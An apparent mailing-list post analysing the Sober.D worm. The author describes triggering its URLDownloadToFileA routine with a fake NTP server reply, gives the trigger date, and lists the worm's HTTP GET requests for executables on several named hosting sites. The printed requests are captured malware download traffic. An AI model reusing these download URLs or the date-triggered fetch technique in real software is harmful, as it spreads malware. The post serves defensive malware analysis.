These who disassembled Sober.D binary must have noticed the
URLDownloadToFileA function.
This function is triggered after some specific date I assume.
My assumption relies on NTP queries that Sober.D is sending.
After creating a NTP server which will give random time I noticed
that after specific reply Sober.D started to download files using
different URIs on 3 hosts.
The response (which triggered the URLDownloadToFileA function) that
my NTP server sent was |d5 93 4c 40| which is 5:40:05 PM 3/8/2004.

Here are some examples of HTTP requests that Sober.D made:
GET /myfirstpage/my.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: home.arcor.de
Connection: Keep-Alive

GET /losdanielos/los.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: home.arcor.de
Connection: Keep-Alive

GET /stefanie-on-web/stef.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: home.arcor.de
Connection: Keep-Alive

GET /myfreeweb/gh.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: people.freenet.de
Connection: Keep-Alive

GET /dannys-page/dann.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: people.freenet.de
Connection: Keep-Alive

GET /stefis_seite/test.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: scifi.pages.at
Connection: Keep-Alive

GET /claudine/de.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: scifi.pages.at
Connection: Keep-Alive

I tried to follow these URLs but the files just weren't there.
Now I'm not sure that there is a connection between NTP and HTTP
requests but the HTTP requests started to come 1 second after the
last NTP request.

I would like to hear your comments on this issue.

Good day,
Evgeny.
